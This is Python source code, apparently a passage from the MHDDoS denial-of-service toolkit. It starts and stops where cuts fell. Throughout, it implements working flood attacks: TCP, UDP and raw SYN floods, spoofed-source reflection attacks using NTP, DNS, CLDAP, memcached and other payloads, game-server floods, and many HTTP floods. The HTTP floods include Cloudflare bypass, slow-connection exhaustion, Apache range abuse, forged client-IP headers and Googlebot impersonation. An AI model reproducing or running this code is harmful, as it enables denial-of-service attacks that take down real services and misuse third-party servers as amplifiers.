LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter:
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return str(ProxyTools.Tools.rand_char(lengh)).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.settimeout(60)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00',
389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00',
53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(ProxyTools.Random.rand_int(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(ProxyTools.Random.rand_int(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
thread_id: int,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._thread_id = thread_id
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.settimeout(60)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(ProxyTools.Random.rand_int(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
ts = time()
for _ in range(self._rpc):
Tools.send(s, payload)
if time() > ts + 120: break
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), Session() as s:
with s.post(self._target.human_repr()) as ss:
ss.raise_for_status()
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: Any = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: Any = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: Any = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
assert self._proxies, \
'This method requires proxies. ' \
'Without proxies you can use github.com/codesenberg/bombardier'
while True:
proxy = randchoice(self._proxies)
if proxy.type != ProxyType.SOCKS4:
break
res = run(
[
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--latencies',
'--timeout=30s',
f'--requests={self._rpc}',
f'--proxy={proxy}',
f'{self._target.human_repr()}',
],
stdout=PIPE,
)
if self._thread_id == 0:
print(proxy, res.stdout.decode(), sep='\n')
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "DGB":
self.SENT_FLOOD = self.DGB
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error(f'Download Proxy Error: {(e.__str__() or e.__repr__())}')
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = f"{gethostname()}@MHTools:~#"
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print(f"{cmd} command not found")
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
